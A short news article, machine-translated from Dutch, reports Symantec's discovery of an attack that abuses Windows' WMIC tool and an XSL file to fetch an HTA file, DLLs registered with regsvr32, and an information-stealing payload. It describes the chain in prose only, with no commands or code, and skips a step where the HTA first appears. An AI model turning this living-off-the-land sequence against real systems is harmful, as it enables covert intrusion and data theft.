Attackers increasingly use legitimate tools or run simple scripts and shell code directly in memory. These living off the land tactics are less likely to be detected by traditional malware protection, Symantec warns.
By carrying out an attack using software and processes that are already present on a targeted computer, a hacker can do his job unnoticed for a longer period of time. This is because (almost) no new unknown files are introduced to the system, which minimizes the risk of detection.
A new attack uncovered by Symantec uses the legitimate WMIC tool in Windows (Windows Management Instrumentation Command-line) in combination with an eXtensible Stylesheet Language (XSL) file to download malware onto a system and then steal information.
WMIC is a legitimate utility that is present on all Windows machines. It is used for management tasks on both local and remote systems and can be used to retrieve system settings, manage control processes and execute scripts.
The use of WMI by cybercriminals is not new. The tool is usually used for propagation, but in this case it is used to download a malicious file, say the Symantec researchers.
The HTA file then generates new dynamic urls in a similar way to download more files, including three DLLs. These are registered using the legitimate regsvr32.exe, as well as the main payload.
The payload contains several modules for stealing information from the affected system. The HTA file can be used to install additional modules, including a password stealing tool, a keylogger, backdoor, and so on.This news article was automatically translated from Dutch to give Techzine.eu a head start. All news articles after September 1, 2019 are written in native English and NOT translated. All our background stories are written in native English as well. For more information read our launch article.